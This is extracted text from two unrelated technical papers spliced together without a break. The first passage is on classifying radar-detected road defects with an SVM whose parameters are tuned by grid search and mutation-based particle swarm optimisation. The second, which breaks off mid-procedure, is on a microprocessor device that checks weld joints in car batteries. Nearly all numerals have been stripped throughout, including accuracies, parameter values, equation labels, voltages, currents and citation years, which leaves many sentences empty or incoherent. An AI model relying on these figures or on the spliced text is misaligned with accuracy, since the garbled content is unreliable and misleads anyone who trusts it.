analyzes its feasibility and realizes ultrasonic nondestructive testing of road defects based on this. using methods from the image recognition field, this study focuses on the design of shallow hidden defect classifiers based on the support vector machine (svm) algorithm. 
the svm method has been widely studied and applied in different contexts. hou improved the svm algorithm's low precision around the hyperplane and reduced its computational complexity for processing large amounts of data; they also improved the algorithm's training efficiency and managed to reduce the number of false calls (hou et al., ). el-saadawi & hatata ( ) used the svm algorithm for the stator winding protection of synchronous generators and achieved good results. the svm algorithm has been widely used in a variety of contexts, such as big data, medical, agricultural, and transportation applications (wang, du & wang, ; wang et al., ; zhang, hu & mao, ). using the svm algorithm, this study optimizes and improves its parameter selection process. by comparing the optimization performance of the grid search (gs) (liu & zhang, ) method and the particle swarm optimization (pso) (yang et al., ) algorithm, the superiority of the pso algorithm is demonstrated, and the svm classification algorithm with pso-based parameter optimization is studied (ma et al., ). by collecting radar images of three defect types on the national highway section from zhengzhou to xinxiang in henan province, it is shown that the obtained method performs well in detecting hidden pavement defects.

image preprocessing and feature extraction
detection principle of the ground penetrating radar
in the gpr approach, the ground is irradiated by high-frequency electromagnetic waves using a transmitting antenna, while the waves reflected from the ground are detected using a receiving antenna. electromagnetic waves are reflected differently by different underground media; thus, different waveforms are registered by the receiving computer for analysis (benedetto et al., ). figure shows the gpr detection process. the reflection coefficient of an electromagnetic wave mainly depends on the dielectric constants of the medium in which the wave originally travels and the medium from which the wave is reflected, as given by eqs. ( ) and ( ):

$$r = \frac{\sqrt{\varepsilon_1} - \sqrt{\varepsilon_2}}{\sqrt{\varepsilon_1} + \sqrt{\varepsilon_2}} \qquad ( )$$
$$v = \frac{c}{\sqrt{\varepsilon_1}} \qquad ( )$$

where r is the reflection coefficient; ε1 and ε2 are the relative dielectric constants of the incident medium and of the medium from which the wave is reflected; v is the echo speed in the incident medium; and c is the speed of light in vacuum.

figure gpr detection process.
figure image segmentation using the canny operator. (a) original image. (b) gaussian filter image. (c) canny operator processing.

selection of the ground penetrating radar
the ground penetrating radar used in this study is the ltd- ground penetrating radar system developed by china electronics technology group corporation. the main components of the system are a mhz shielded antenna, a data acquisition host, a computer, data cables, etc.
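as a small numerical illustration of eqs. ( ) and ( ), the snippet below evaluates the reflection coefficient at an interface between two media and the wave velocity in a medium; the dielectric constants are assumed textbook values (dry asphalt over an air-filled void), not measurements from this study.

```python
import math

C = 2.998e8  # speed of light in vacuum, m/s

def reflection_coefficient(eps1, eps2):
    """Reflection coefficient at the interface between media with relative permittivities eps1 -> eps2."""
    return (math.sqrt(eps1) - math.sqrt(eps2)) / (math.sqrt(eps1) + math.sqrt(eps2))

def wave_velocity(eps):
    """Electromagnetic wave velocity in a medium with relative permittivity eps."""
    return C / math.sqrt(eps)

# assumed example values: dry asphalt (~4) over an air-filled void (~1)
print("r =", round(reflection_coefficient(4.0, 1.0), 3))
print("v =", f"{wave_velocity(4.0):.2e}", "m/s")
```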
the clutter distribution is typically non-uniform, affecting the correct recognition and classification of road conditions. to improve the accuracy of the road condition determination, it is necessary to remove the effect of this clutter (bu, ). to extract the features associated with various road conditions, the acquired images should be segmented. image filtering. the objective of image filtering is to minimize the effects of noise and interference in raw images. the noise and interference are mainly attributed to the processes –image acquisition and image transmission. gaussian filtering is typically used for image denoising, which can remove unnecessary interference and protect the edge of the image. image segmentation. the objectives of image segmentation are to classify foreground and background pixels, and to determine the organization of foreground pixels (i.e., detect foreground objects) (fengjun et al., ). the canny operator has been widely used for image segmentation of radar images, and its segmentation performance after gaussian filtering is demonstrated in fig. . figure a is the original radar acquisition diagram. figure b is the result after gaussian transformation. it can be seen that the clutter in the original image is removed. figure c is the disease characteristic waveform diagram extracted after canny operator. to retain only the necessary information, the image was subjected to the morphological operations of liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure projection segmentation results. full-size doi: . /peerjcs. /fig- expansion and corrosion; the results are shown in fig. . figure a is the image after canny operator segmented the disease waveform. figure b is an enhanced disease waveform diagram after the segmented waveform is processed by digital morphology, so as to facilitate the extraction of disease features in the following text. the processed image was segmented and objects were extracted using the vertical projection method, as shown in fig. . feature extraction. feature extraction should satisfy the following requirements: ( ) features should have strong anti-interference ability; ( ) features should be insensitive to translation, rotation, and scale transformation of images; ( ) features should be insensitive liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table gray level co-occurrence matrix characteristics of cracks, voids, and subsidence. defect type crack glcm ◦ ◦ ◦ ◦ contrast . . . . correlation . . . . energy . . . . homogeneity . . . . defect type void glcm ◦ ◦ ◦ ◦ contrast . . . . correlation . . . . energy . . . . homogeneity . . . . defect type subsidence glcm ◦ ◦ ◦ ◦ contra . . . . correlation . . . . energy . . . . homogeneity . . . . table differential statistical matrix characteristics of cracks, voids, and subsidence. glds mean contrast asm ent crack . . . . void . . . . subsidence . . . . to geometric distortions; ( ) distance between similar images should be as small as possible; and ( ) distance between different images should be as large as possible. the algorithm for extracting feature vectors should be simple, and the dimensionality of the feature space should not be too high for ensuring the classification performance of the system (xiao & liu, ). 
to satisfy the above requirements, the following features were used: area, image complexity, image texture, and seven rectangular features. in this study, three types of road hazards are studied, namely, road cracking, hollowing, and subsidence. through simulation and actual images, combined with the classification of expert experience, three types of samples are collected to describe these conditions. twentynine feature vectors were extracted for each sample, and the obtained set of features is shown in tables , and . the dimensions of the different features are very different. direct use of feature data not only reduces the system performance, but also affects the classification accuracy. to avoid this shortcoming, it is necessary to perform data normalization (chowdhury et al., ). let the eigenvector of a pattern vector be x =(x ,x ,...,xm). then the normalized liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table seventh order invariant moment feature. seven-order hu moment crack void subsidence . . . . . . . . . . . . . . . . . . . . . eigenvector x′i is x′ij = . + . (xij−xi,min) xi,max−xi,min (i= , ,...,m) ( ) where, xi,max,xi,min are the maximum and minimum of {xi(k)|k− ,...,p}, and p is the overall number of samples in the training set. feature selection. in this study, k −l transformation was used as the feature selection algorithm (jun, ). k −l transformation can take into account different classification information and realize supervised feature extraction. under the criterion of minimum mean square error, it can obtain an orthogonal transformation matrix a that can map the original feature x ′ from high-dimensional space d to low-dimensional space vector y′. k−l transformation can retain the data component with the largest variance in the original data and highlight the data difference. empirical knowledge was used for removing several highly correlated features, and k−l changes were used for reducing the dimensionality of the original feature space. a relatively simple class-center classifier was used for identifying the samples after the k−l dimensionality reduction transformation. the recognition rate is shown in fig. for the test set. according to fig. , when the dimensionality of the feature space reaches , the recognition rate saturates; thus, the optimal dimensionality of the feature space is . k−l transformation can take into account different classification information, realize supervised extraction of features with too high correlation, and then use k−l transformation to extract data information from them, thus achieving the purpose of compressing dimensions and improving recognition rate. the svm classifier design basic principle of the svm svm is a binary classification algorithm that is trained using the supervised learning paradigm. the algorithm attempts to determine an optimal classification hyperplane, whereby the edge distance between two sample classes and the dividing hyperplane (decision boundary) is maximized. the larger the edge distance is, the more separated the two sample classes are, the stronger the classification robustness, and the better the liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure dependence of the recognition rate on the number of features. full-size doi: . /peerjcs. /fig- method’s generalizability (liu et al., ). 
the hyperplane equation is ω t x+b= ( ) whereω is the normal to the hyperplane, and x determines the angle with the hyperplane; b is the distance between the hyperplane and the origin. the hyperplane is denoted as (ω,b); then, the distance from a certain point (sample) to the hyperplane (ω,b) is denoted by r: r = ∣∣ωt x+b∣∣ ‖ω‖ ( ) let the support vector be and point away from the hyperplane, so that ∣∣ωt x+b∣∣= , and let the vectors in the two different classes be γ and point away from the hyperplane: γ = ||ω|| ( ) for optimal segmentation, we need to find the hyperplane with the largest interval; that is, we need to find the parameters ω and b that maximize γ . according to eq. ( ), only ‖ω‖− should be maximized. optimization of the svm classifier parameters we used matlab (mathworks, inc.) to validate the diagnostic accuracy of the svm- based classifier with respect to the road conditions. we obtained a dataset comprising liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure parameter optimization results of the grid search method. full-size doi: . /peerjcs. /fig- examples of road cracking, hollowing, and subsidence conditions; % of these images were used for training the method, while the remaining % were used for testing the classifier. the performance of any svm classifier depends on the penalty factor and kernel function parameters. the optimal parameter values are typically determined using the grid search approach, which exhausts the set of possible parameter combinations to determine the optimal combination. the penalty term c and the kernal function parameters g were considered to grow exponentially in the [ − , ] range; at the same time, the step between each cell on the grid was set to . , that is, the growth time-points were − , − . ,..., . as shown in fig. , the best classification performance was obtained for log (c)= . , best log (g) =− . . as shown in the retrieval results above, the accuracy of log (c) between [ , ] and log (g) between [ − , − ] was relatively good; thus, the step was set to . in this range, and the parameters were further optimized. the results are shown in fig. . according to fig. , the best classification was obtained for best= and best=− . . these optimal values were used as the svm classifier parameters for validating its classification performance; then, the accuracy of the classifier with these parameters was characterized. the validation results are shown in fig. , and the final validation accuracy rate was . %, the image recognition time is t = . s. adaptive mutation particle swarm the results obtained using the grid search approach can meet the desired detection requirements, but because the grid search approach only considers discrete combinations of parameters, the optimal solution can be easily missed. at the same time, the grid search liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure results obtained after refining the step size. full-size doi: . /peerjcs. /fig- figure test-set classification results after the grid search optimization of the svm classifier parame- ters. full-size doi: . /peerjcs. /fig- liu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. 
at the same time, the grid search method is exhaustive and needs to consider all possible cases; thus, this optimization approach is time-consuming. to improve the accuracy and reduce the computation time, the pso algorithm is introduced in this section.

the pso approach. pso simulates a flock of birds, which are modeled as massless particles (hsieh et al.). each particle has only two attributes: velocity v and position x. velocity represents the speed of movement, and position represents the direction of movement. each particle searches for the optimal solution separately in the search space and records it as its current individual extremum p; the individual extrema are shared among all particles in the swarm, and the best of them is taken as the current global optimal solution g of the entire swarm. all particles then adjust their speeds and positions according to their own current individual extremum p and the current global optimal solution g shared by the whole swarm. the underlying pso process is relatively simple and can be divided into the following steps: ( ) initialize the particle swarm; ( ) evaluate the particles, that is, calculate their fitness values; ( ) search for the individual extrema p; ( ) search for the global optimal solution g; ( ) update the particles' speeds and positions (yang and wang). the update equations are

v_id^(k+1) = ω v_id^k + c_1 · rand(0,1) · (p_id^k - x_id^k) + c_2 · rand(0,1) · (p_gd^k - x_id^k)
x_id^(k+1) = x_id^k + v_id^(k+1)

where ω is the inertia factor, c_1 and c_2 are the acceleration constants, and rand(0,1) are random numbers in the interval (0,1). p_id denotes the d-th dimension of the individual extremum of particle i, p_gd denotes the d-th dimension of the global optimal solution, and k is the current iteration number.

pso-based parameter optimization. the following parameter values were used: c_1 = , c_2 = , population size = , maximal number of iterations = , and cross-validation fold k = . the fitness curve for the optimized svm classifier parameters is shown in fig. . after iteration , the fitness reached its optimal value. at this point, the classifier accuracy was . %, the best c was . , and the best g was . . although the basic pso algorithm exhibits a good convergence speed and good optimization performance, it can prematurely converge onto a locally optimal solution; as a result, the population easily stagnates without external pressure.

figure : fitness curve obtained after the pso.

variation improvement. to deal with the premature convergence problem, we utilized the concept of mutation that is often used in genetic algorithms and incorporated mutations into the pso framework. for that, we defined a trigger that allows particles to escape locally optimal solutions, thus ensuring a global search (tong et al.). the population fitness variance σ² was used to determine whether a local optimum was reached during the iteration process. it was defined as

σ² = Σ_{i=1..n} ((f_i - f_avg) / f)²

where n is the number of particles, f is the normalization (calibration) factor, f_i is the fitness of the i-th particle, and f_avg is the average fitness.
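a compact python sketch of the velocity/position update and the population fitness variance defined above; the inertia and acceleration constants are illustrative, and the normalization factor f follows one common convention since its exact definition is not recoverable from the text.

```python
import numpy as np

def pso_step(x, v, pbest, gbest, w=0.7, c1=2.0, c2=2.0, v_max=1.0):
    """One PSO iteration: update velocities and positions of all particles.
    x, v, pbest have shape (n_particles, n_dims); gbest has shape (n_dims,)."""
    r1 = np.random.rand(*x.shape)
    r2 = np.random.rand(*x.shape)
    v = w * v + c1 * r1 * (pbest - x) + c2 * r2 * (gbest - x)
    v = np.clip(v, -v_max, v_max)
    return x + v, v

def fitness_variance(fitness):
    """Population fitness variance sigma^2 used to detect premature convergence."""
    fitness = np.asarray(fitness, dtype=float)
    f_avg = fitness.mean()
    spread = np.abs(fitness - f_avg).max()
    f_norm = spread if spread > 1.0 else 1.0  # assumed normalization factor f
    return float(np.sum(((fitness - f_avg) / f_norm) ** 2))
```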
it can be seen that the larger the value of σ², the more divergent the particle swarm; conversely, the smaller the population fitness variance, the more convergent the particle swarm. values of σ² close to zero indicate that the particle swarm is either approaching the globally optimal solution or converging onto a locally optimal one. to avoid premature trapping of the particle swarm in local optima, the swarm is subjected to mutations:

x_i(k+1) = c · rand(0,1) · x_i(k)

where c is a normally distributed random number in the [ , ] interval acting as the variation factor, rand(0,1) is a random number in the [0,1] range, and k is the iteration number. mutations alter the particles' positions and thus allow them to escape local optima (deng et al.). the fitness curve of the improved adaptive mutation pso algorithm for svm parameter optimization is shown in fig. . evidently, the best fitness first converges to a local maximum after generations. the mutations allow the particle swarm to escape this local maximum after generations; after that, the optimization parameters are determined with higher accuracy. the finally estimated parameter values are c = . and g = . , and the fitness at this global optimum is . %.

figure : fitness curve obtained after the variant pso.

simulation results. based on the results in the previous section, an svm model was constructed using the parameter values c = . and g = . , which were determined using the pso method. the results are shown in fig. . for these parameter values, the accuracy of the model was . % and the image recognition time was t = . s; however, the recognition accuracy had not improved. the main explanation is that the particle swarm became trapped in a local optimum during parameter optimization. an svm classifier was then constructed and validated using c = . and g = . , the parameter values determined by the adaptive mutation pso algorithm. the validation results are shown in fig. . from fig. , the classification accuracy of the svm classification model with the parameters determined by the adaptive mutation pso was . % and the image recognition time was t = . s. this classification accuracy is significantly higher than that achieved by the svm whose parameters were optimized with the grid search approach.

figure : validation results of the svm model, for conventional pso.

conclusions

according to the requirements of automatic recognition of highway hidden-layer conditions, this paper proposes an automatic detection and recognition method that uses an svm with parameters optimized by the adaptive mutation pso approach. in this method, pso with mutations is used for parameter optimization. in this study, three different methods were used for parameter optimization: ( ) the grid search method, ( ) the pso approach, and ( ) the adaptive mutation pso. matlab and python were used for implementing these optimization methods, and the optimization processes and their results were validated.
compared with the grid search method and the simple pso approach, the accuracy of the svm with parameters optimized using the mutation pso was higher, translating into better performance on automatic identification of highway conditions. our simulation results showed that the classification accuracy of the svm classifier with the grid search method was . %, the classification accuracy with pso was . %, and the classification accuracy with mutation pso was . %. the svm classifier with mutation pso is thus clearly better than the other two, and the classification accuracy is improved compared with the grid search method. however, owing to the pre-processing of the images and the processing of feature-related data, some defect-related information is likely to become distorted, which can affect the recognition accuracy. if a zero-distortion image processing method can be found, the recognition accuracy will be greatly improved. at present, only cracks, voids and subsidence can be analyzed and studied, while asphalt pavement diseases and defects can be divided into categories and items. in order to better improve the scope of the identification system, further research should be done on other types of defects.

figure : validation results of the svm model, for variant pso.

additional information and declarations

funding. this work was supported by the key scientific research projects of higher education institutions in henan province (no. a ) and the henan key youth teacher research project ( ggjs- ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures. the following grant information was disclosed by the authors: scientific research projects of higher education institutions in henan province: a . henan key youth teacher research project: ggjs- .

competing interests. liangqi zhang is a postdoctoral supervisor in the postdoctoral workstation of wanli road & bridge group co. ltd. xinyu liu is engaged in related research at this postdoctoral workstation. liangqi zhang is xinyu liu's second mentor during his postdoctoral fellowship.

author contributions.
• xinyu liu conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft.
• peiwen hao and liangqi zhang performed the experiments, prepared figures and/or tables, and approved the final draft.
• aihui wang performed the computation work, prepared figures and/or tables, and approved the final draft.
• liangqi zhang performed the experiments, prepared figures and/or tables, and approved the final draft.
• bo gu and xinyan lu analyzed the data, authored or reviewed drafts of the paper, and approved the final draft.

data availability. the following information was supplied regarding data availability: raw data and code are available in the supplementary files.

supplemental information. supplemental information for this article can be found online.

references

benedetto a, tosti f, bianchini ciampoli lb, d'amico f. an overview of ground-penetrating radar signal processing techniques for road inspections.
signal processing.
bu f. a high-order clustering algorithm based on dropout deep learning for heterogeneous data in cyber-physical-social systems. ieee access.
chowdhury sa, stepanov ea, danieli m, riccardi g. automatic classification of speech overlaps: feature representation and algorithms. computer speech and language.
deng w, yao r, zhao h. a novel intelligent diagnosis method using optimal ls-svm with improved pso algorithm. soft computing.
el-saadawi m, hatata a. a novel protection scheme for synchronous generator stator windings based on svm. protection and control of modern power systems.
fengjun c, chenghan w, mengmeng gu, yandong z. spruce image segmentation algorithm based on fully convolutional networks. transactions of the chinese society for agricultural machinery.
guo sl, xu l, li x-z. application of gpr in detection of road surface settlement. progress in geophysics.
hou k, shao g, wang h. research on practical power system stability analysis algorithm based on modified svm. protection and control of modern power systems.
hsieh yz, su mc, chen jh. developing a pso-based projection algorithm for a porosity detection system using x-ray ct images of permeable concrete. ieee access.
jun n. a data reduction algorithm based on k-l feature compression for cloud computing. microelectronics and computer.
liang m-t, su p-j. detection of the corrosion damage of rebar in concrete using impact-echo method. cement and concrete research.
liu y, li x, li s, zhu x. imbalanced dataset classification algorithm based on improved support vector machine. journal of shihezi university (natural science).
liu x, zhang z. parameter optimization of support vector machine based on improved grid search method. journal of jiangxi university of science and technology.
ma z, dong y, liu h, shao x, wang c. method of forecasting non-equal interval track irregularity based on improved grey model and pso-svm. ieee access.
mandal t, tinjum jm, edil tb. non-destructive testing of cementitiously stabilized materials using ultrasonic pulse velocity test. transportation geotechnics.
marecos v, solla m, fontul s, antunes v. assessing the pavement subgrade by combining different non-destructive methods. construction and building materials.
si y, wang gl. study on the response characteristics of different physical anomalies in the detection of ground-penetrating radar. journal of yunnan university (natural sciences edition).
tong y, zhong m, li j, li d, wang y. research on intelligent welding robot path optimization based on ga and pso algorithms. ieee access.
wang w, du x, wang n. building a cloud ids using an efficient feature selection method and svm. ieee access.
wang c, zhang y, song j.
a novel optimized svm algorithm based on pso with saturation and mixed time-delays for classification of oil pipeline leak detection. systems science and control engineering.
wen mb, edil t, tinjum j, gokce a, wang j. characterization of cementitiously stabilized layers for use in pavement design and analysis. test procedure evaluation report, national cooperative highway research program, washington, d.c., usa.
xiao z, liu h. adaptive features fusion and fast recognition of potato typical disease images. transactions of the chinese society for agricultural machinery.
yang j, wang x. extended pso based collaborative searching for robotic swarms with practical constraints. ieee access.
yang l, zhichuan z, alin h. pulmonary nodule recognition based on multiple kernel learning support vector machine-pso. computational and mathematical methods in medicine.
zhang h, hu yx, mao hp. image recognition and classification of the stored-grain pests based on support vector machine. journal of agricultural mechanization research.

蓄電池焊接點檢查機之研製
implementation of an automatic checking machine for battery welding condition
kuen-cheng wang, chih-hung wang, tsair-rong chen
department of electrical engineering, national changhua university of education, shida road, changhua, taiwan. e-mail: kuenbao@ms .hinet.net

abstract. a common automobile battery is composed of six cells connected in series, with a tab welded between adjacent cells to make the connection. the quality of the welding points is therefore closely related to the lifetime of the battery. if a welding point is not solid enough, it produces high resistance and heat during repeated large-current charge and discharge, eventually leading to breakage of the welding point and damage to the battery. this paper implements a checking machine for the battery welding condition. the machine uses a microprocessor as the core of control, combined with a direct-current power supply, to measure the internal resistance of the welding points of the battery so that their condition can be judged. the internal-resistance signal passes through an amplifier and then a buffer circuit, and the analog signal is converted into a digital signal and conveyed to the microprocessor. the result is shown on an led display, which reveals the measurement outcome after comparing the signal with a setup value. meanwhile, a relay contact can be used to notify the plc of the automatic production line of the condition of the battery, while rs- or rs- can be used to link with a computer to record the welding condition of the battery.

keywords: battery welding condition checking, large current charge and discharge, microprocessor.
introduction

a storage battery generally includes a number of electrode plates [ , ], which are immersed in an electrolytic solution and interconnected sequentially in series. the series connections among the electrode plates are accomplished by soldering adjacent pairs of soldering lugs of the storage battery. if the soldering points are not firm, failure of the series connections is likely to occur. moreover, if air is trapped in a soldering point, the soldering point is likely to break when a large electric current passes through it. furthermore, if governments promote electric vehicles for environmental protection someday, it will be even more important that the pads are soldered well under large-current charging and discharging [ - ]. therefore, it is necessary to find ways to determine the quality of soldering points so as to ensure the quality of a storage battery product. in this study, we developed a device for inspecting the soldering points in a storage battery, which measures the internal resistance of the battery pads. to judge whether a pad is good, the device can also provide the inspection results to an external processing device for storage.

in general, lead-acid batteries have pasted-plate anodes employing lead as the electrode material, and the electrode surface is covered with a checkerboard grid of brown pbo2. the thin plates filled with active matter yield high output power. the pbo2 used in batteries is formed by bonding fine particles of lead oxide. these fine particles ensure a large area of contact with the electrolyte, which reduces the battery's internal resistance. the cathode plate is produced by mixing lead with dilute sulfuric acid and a small quantity of additives to form a paste-like material. cathode plates may also be made from soft, porous, spongy pure lead. the gray paste is applied to a lead alloy grid and allowed to cure and dry to form an unfinished cathode plate. a porous separator made of insulating material is inserted between the anode plate and the cathode plate. the anode and cathode plates must be parallel and as close as possible, but may not be in contact. when the anode and cathode plates are arranged in an alternating arrangement, the tabs on the electrode plates are connected with soldered lead alloy straps, forming the anode and cathode elements shown in figures and . the alternating arrangement of anode and cathode elements forms a cell, as shown in figure . this cell can generate approximately v of electromotive force. because a larger plate area can yield greater current, several plates are connected in parallel in order to increase the current. to increase the voltage, two cells can be connected in series to yield v, three cells to yield v, four cells to yield v, or six cells to yield v. ordinary car batteries are generally produced in this way. the cells shown in figure employ impact-resistant expanded polypropylene (epp), which has been used to form six cells via injection molding. the anode plate and cathode plate are then connected using soldered straps: the cathode strap at the output end of one cell is soldered to the anode strap of the adjacent cell. because the shorter the current path between two cells, the smaller the resistance between the cells, adjacent cells have a through connection to minimize resistance and ensure good discharge. most car batteries employ this method.
in the aforementioned six-cell battery, the cells and cell covers are bonded by thermal soldering, and each cell is sealed and separated from the other cells. the cells are then filled with dilute sulfuric acid to complete the battery. when discharging, the pbo2 of the anode reacts with the sulfuric acid to form lead sulfate (pbso4), and the lead of the cathode also reacts with the sulfuric acid to form pbso4. the following chemical equations ( ) to ( ) describe the discharge [ , ]:

cathode: pbo2 + 4h+ + so4(2-) + 2e- → pbso4 + 2h2o ( )
anode: pb + so4(2-) → pbso4 + 2e- ( )
battery: pb + pbo2 + 2h2so4 → 2pbso4 + 2h2o ( )

the following chemical equation describes charging:

2pbso4 + 2h2o → pb + pbo2 + 2h2so4 ( )

the conversion of pbso4 on the surface of the anodes back to pbo2 is the main chemical reaction occurring during charging, but secondary reactions involving loss of water and corrosion of lead also occur, as follows:

pbso4 + 2h2o → pbo2 + h2so4 + 2h+ + 2e- ( )
2h2o → o2 + 4h+ + 4e- ( )

pbso4 is also reduced to lead on the surface of the cathode, at which time the following two reactions occur at the cathode:

pbso4 + 2h+ + 2e- → pb + h2so4 ( )
2h+ + 2e- → h2 ( )

after charging, the pbo2 on the anode plate is restored, and the cathode becomes spongy as the pbso4 on its surface absorbs electrons and is reduced to lead. in addition, the electrolysis of water leads to the release of oxygen at the anode and hydrogen at the cathode. cell covers are equipped with cocks with small vent holes. most ordinary batteries are of this type. water is lost to evaporation after a battery has been in use for a period of time, and deionized water must be added once the water level falls below the minimum level. because adding water to batteries is troublesome for consumers, manufacturers developed batteries requiring no water addition. these batteries are often known as sealed lead-acid batteries (slabs); calcium, instead of antimony, is alloyed with lead in this type of battery. because the reduced self-discharge raises the gassing point of hydrogen at the cathode, the amount of hydrogen produced by electrolysis during charging is lower in sealed batteries.

the capacity of ordinary lead-acid batteries is expressed in ampere-hours (ah), which is the product of current (a) and discharge time (h). because a large capacity requires a large electrode plate area and a large number of parallel electrode plates, a high-capacity battery has a large volume. a ah car battery should be able to produce a current of a for hours, which can be expressed as . c, or a current of . a for hours, which can be expressed as . c. starting a car engine requires a transient current of approximately a- a (depending on the type of car). since the car engine is not running at this time, all power must be supplied by the battery. after float charging at a voltage of . v, a car battery normally maintains a voltage of roughly . v. the transient starting voltage falls to around v (within three seconds), and may fall to - v if starting continues for five or six seconds. the voltage drops more in winter than in summer. after the car starts, the generator float-charges the battery at a voltage of . v. as the car is driven, the charging current gradually decreases.

fig. : anode plates arranged in an alternating arrangement. fig. : cathode plates arranged in an alternating arrangement. fig. : the cells. fig. : storage battery.
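the capacity and c-rate relations discussed above reduce to simple arithmetic; the numbers in the example are illustrative only, since the original figures were lost from the text.

```python
def discharge_hours(capacity_ah, current_a):
    """Hours of discharge at a constant current, from capacity = current x time."""
    return capacity_ah / current_a

def c_rate(current_a, capacity_ah):
    """Discharge rate expressed as a multiple of the rated capacity."""
    return current_a / capacity_ah

# illustrative values: a 100 Ah battery delivering 5 A runs for 20 h, i.e. a 0.05C discharge
print(discharge_hours(100, 5), c_rate(5, 100))
```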
design of an automatic testing machine for battery soldering

the purpose of this research is to develop a device for inspecting the soldering points in a storage battery, which can provide inspection results for storage by an external processing device. the system, shown in figure , comprises a power supply unit and an inspecting unit. the power supply unit outputs a test power signal to be applied to the solder spot. the inspecting unit includes first and second inspecting terminals and a control module. the first and second inspecting terminals are connected electrically to the soldering point so as to detect the response of the soldering point to the test power signal applied by the power supply unit. the control module determines whether the response detected through the first and second inspecting terminals falls within a predetermined range configured in the control module; it generates an indication signal if the detected response falls outside the predetermined range, and generates an inspection result corresponding to the detected response.

fig. (a): schematic sectional view of a conventional storage battery to be inspected by the device according to the present invention. fig. (b): schematic view of the preferred embodiment of a device for inspecting a soldering spot in a storage battery. fig. (c): schematic block diagram of the preferred embodiment.

the configuration of the system comprises the following parts: device for inspecting soldering spots in a storage battery; probes; storage battery; soldering spots; lugs; housing; power supply unit; inspecting unit; first inspecting terminals; second inspecting terminals; input module; control module; analog-to-digital converting module; transmission interface; operating interface; control interface; indication interface; external processing device; r: resistance; external peripheral device; v: test source.

the advantages of this testing machine are that, because the inspection of the soldering points is conducted by the inspecting unit using electrical signals, the quality of the soldering points can be accurately determined. furthermore, by outputting the inspection results through the transmission interface, the results can be stored for future evaluation of the quality of a batch of storage battery products.

soldering point signal processing design

the signal processing procedures and mechanisms of this soldering point testing machine are as follows:

a. input signal: because the signal from a soldering point is small and easily disturbed by the external environment (such as electric and magnetic fields), the signal must first be processed to determine the correct signal value.

b. filter circuit: this circuit is laid out as shown in figure and has the following three main functions: ( ) the filter circuit contains a low-pass filter comprising resistor r and capacitor c to eliminate noise and allow only the true signal to pass. ( ) overvoltage protection is provided by the two diodes d and d ; when an anomalous voltage occurs externally, the signal remains clamped at a potential in the range of ± v, protecting the ic elements. ( ) the input impedance matching circuit relies on the high input impedance of operational amplifier u (greater than mΩ) to reduce the effective load.
c. amplifier circuit: this circuit relies on the operational amplifier and resistors r and r to amplify the small signal to a potential of vdc, which is needed for subsequent processing by the analog-to-digital circuit. the amplification formula is given in eq. ( ). to ensure that the operational amplifier's input bias (ib) currents are matched, care must be taken that r = r ∥ r . if they are not matched, changes in the ambient temperature will affect the operational amplifier's output value, causing signal bias. capacitor c in parallel with resistor r chiefly serves to eliminate signal instability due to noise from the operational amplifier at high amplification.

d. analog-to-digital circuit: because the microprocessor can only read digital signals and cannot read analog signals, this circuit converts the analog signal to a digital signal. attention must be paid to the resolution, sampling rate, and output connection when designing this circuit. the circuit is shown in figure .

fig. : filter circuit. figure : analog-to-digital circuit.

the ti ads ic is an analog-to-digital conversion circuit employing a differential model to encode a - . vdc analog signal as a digital value. the resolution is bits, and the circuit communicates with the microprocessor over the scl and sda wires (i2c). the transmission rate is conversions per second.

e. microprocessor: an st f -bit microprocessor is responsible for reading the digital signal from the analog-to-digital circuit. after processing and updating by the microprocessor's internal program, the signal is sent to a display showing the current value. current values are also stored in memory and are available for reading via an rs- communications cable. in addition, the microprocessor must compare the relays' setting parameters with the current parameters; when a setting parameter is reached, a relay action signal is output to the corresponding relay. finally, the microprocessor also handles editing functions from the keyboard (such as relay action settings) and updates the values stored in memory.

f. display: the display shows the current value, the relay output status, and the computer online status. it consists of a five-digit seven-segment display and an led circuit. the display's scanning connection with the microprocessor reduces the load on the microprocessor's i/o pins. the microprocessor sends the number to be displayed to segment pins a-g and drives the selected digit line high, which causes that digit to light up. for instance, to show a given digit, the microprocessor first sets the required segment pins high and the remaining segment pins low, and then sends a high potential to digit line d to display it; the same method is used for digit lines d , d , d and d . since the scanning rate is greater than the persistence of vision, a five-digit number is seen.

g. relay output: responsible for receiving signals from the microprocessor and activating the relay coils to change the state of the relay contacts (for example, changing a normally open contact to a closed one). attention must be paid to the relay contact capacity; erroneous action due to insufficient contact capacity should be avoided.

h. rs- computer connection: the rs- link employs the modbus communication mode, which involves a half-duplex connection, for reading and writing.
so-called half duplex means that the link can only transmit or receive at any one time, and cannot transmit and receive simultaneously. furthermore, the communications format must match that of the server for a connection to be made: the communications rate (e.g., bits/sec or bits/sec), the parity detection (none or odd), and the stop bit (either or ).

i. keyboard actions: the main keyboard functions are used for entering and editing the customers' different setting points.

automatic testing system

a. the automatic testing system is shown in figure . the testing steps are as follows.
( ) prepare the desired testing mold (tooling).
( ) turn the "auto/manual" switch to "manual".
( ) turn off the power of the controller (sw r).
( ) loosen the screws of the gate plates in front of the mold (tooling), remove the two gate plates, and pull off the plug so that the worker can remove the mold.
( ) put on the desired mold, let the gate plates hold the mold, lock the screws, and put the plug back on.
( ) to change molds, turn off the power of the weld checking controller, pull off the plug on the mold, loosen the two fixing handles on the gate plate in front of the mold base, and remove the mold; in the reverse process, put on the desired mold and plugs and then turn on the controller.

b. the adjustment steps are as follows.
